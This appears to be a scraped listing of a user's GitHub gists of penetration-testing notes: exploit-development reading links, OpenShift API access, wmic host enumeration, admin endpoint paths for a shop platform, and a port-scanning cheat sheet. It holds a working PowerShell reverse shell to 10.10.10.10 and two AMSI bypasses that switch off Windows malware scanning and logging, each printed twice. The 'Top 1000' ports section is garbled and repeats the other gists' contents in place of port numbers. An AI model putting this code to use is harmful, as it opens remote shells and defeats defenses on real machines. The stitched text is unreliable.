podjackel

## OSCE Preparation
http://whitelist1.com/
https://ocw.cs.pub.ro/courses/cns/labs/start
https://windowsexploit.com/blog
https://www.securitysift.com/windows-exploit-development-part-1-basics/
http://6.www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
http://corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://tuts4you.com/e107_plugins/download/download.php?list.17=
https://learnxinyminutes.com/docs/c/
http://www.thegreycorner.com/
http://www.dmi.unipg.it/bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html

## routers.txt
10.0.0.1
10.0.1.1
10.0.2.1
10.0.3.1
10.0.4.1
10.0.5.1
10.0.6.1
10.0.7.1
10.0.8.1
10.0.9.1

## OpenShift-Notes.md

      
              1 file
            
          
              0 forks
            
          
              1 comment
            
          
              0 stars
            
          
                podjackel
                / OpenShift-Notes.md
            
            
              Last active
              September 7, 2021 19:51
            
              
                OpenShift Notes
              
          
    Getting access


Use the Openshift Client to connect to instances

oc login -u $USERNAME -p $PASSWORD


Can also use the REST Api

Needs a bearer token, login with oc login then run oc whoami -t to get the token


TOKEN=`oc whoami -t`
curl --insecure -H "Authorization: Bearer $TOKEN" https://$TARGET:8443/oapi/v1


## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## wmic_cmds.txt
Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

## amsi_and_autologging_bypass.ps1
# My original AMSI bypass - does not attempt to bypass WMF autologging
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Modified AMSI bypass that also bypasses WMF5 autologging.
# This was reported to MS. CreateDelegate simply needs to be added to the "suspicious" signature list.
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)

## gist:ad403cb47466266a504d487a136b0d7a
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */
/*  AES implementation in JavaScript (c) Chris Veness 2005-2011                                   */
/*   - see http://csrc.nist.gov/publications/PubsFIPS.html#197                                    */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */

var Aes = {};  // Aes namespace

/**
 * AES Cipher function: encrypt 'input' state with Rijndael algorithm
 *   applies Nr rounds (10/12/14) using key schedule w for 'add round key' stage

## makeshop common endpoints
/makeshop/newmanager/board_board.html
/makeshop/newmanager/board_boardlist.html
/makeshop/newmanager/board_newmake.html
/makeshop/newmanager/board_notice.html
/makeshop/newmanager/coupon_import_brand.html
/makeshop/newmanager/coupon_list.html
/makeshop/newmanager/crm_banner.html
/makeshop/newmanager/crm_codeimg.html
/makeshop/newmanager/crm_detailevent.html
/makeshop/newmanager/crm_enquete.html

## powershell_reverse_shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);
# $stream = $client.GetStream();
# [byte[]]$bytes = 0..65535|%{0};
# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
# $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
# $sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";
# $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
# $stream.Write($sendbyte,0,

## Port Scanning Cheat Sheet.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              2 stars
            
          
                podjackel
                / Port Scanning Cheat Sheet.md
            
            
              Last active
              February 29, 2024 09:40
            
          
    nmap --top-ports <#ports> -v -oG - localhost

Top 100:
7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157

Top 1000:
	http://whitelist1.com/
	https://ocw.cs.pub.ro/courses/cns/labs/start
	https://windowsexploit.com/blog
	https://www.securitysift.com/windows-exploit-development-part-1-basics/
	http://6.www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
	http://corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
	https://tuts4you.com/e107_plugins/download/download.php?list.17=
	https://learnxinyminutes.com/docs/c/
	http://www.thegreycorner.com/
	http://www.dmi.unipg.it/bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html
	10.0.0.1
	10.0.1.1
	10.0.2.1
	10.0.3.1
	10.0.4.1
	10.0.5.1
	10.0.6.1
	10.0.7.1
	10.0.8.1
	10.0.9.1
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	Host Enumeration:

	--- OS Specifics ---
	wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

	wmic computersystem LIST full

	--- Anti-Virus ---

	wmic /namespace:\\root\securitycenter2 path antivirusproduct
	# My original AMSI bypass - does not attempt to bypass WMF autologging
	[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

	# Modified AMSI bypass that also bypasses WMF5 autologging.
	# This was reported to MS. CreateDelegate simply needs to be added to the "suspicious" signature list.
	[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
	/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
	/* AES implementation in JavaScript (c) Chris Veness 2005-2011 */
	/* - see http://csrc.nist.gov/publications/PubsFIPS.html#197 */
	/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */

	var Aes = {}; // Aes namespace

	/**
	* AES Cipher function: encrypt 'input' state with Rijndael algorithm
	* applies Nr rounds (10/12/14) using key schedule w for 'add round key' stage
	/makeshop/newmanager/board_board.html
	/makeshop/newmanager/board_boardlist.html
	/makeshop/newmanager/board_newmake.html
	/makeshop/newmanager/board_notice.html
	/makeshop/newmanager/coupon_import_brand.html
	/makeshop/newmanager/coupon_list.html
	/makeshop/newmanager/crm_banner.html
	/makeshop/newmanager/crm_codeimg.html
	/makeshop/newmanager/crm_detailevent.html
	/makeshop/newmanager/crm_enquete.html
	$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

	# $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);
	# $stream = $client.GetStream();
	# [byte[]]$bytes = 0..65535\|%{0};
	# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
	# $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
	# $sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
	# $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
	# $stream.Write($sendbyte,0,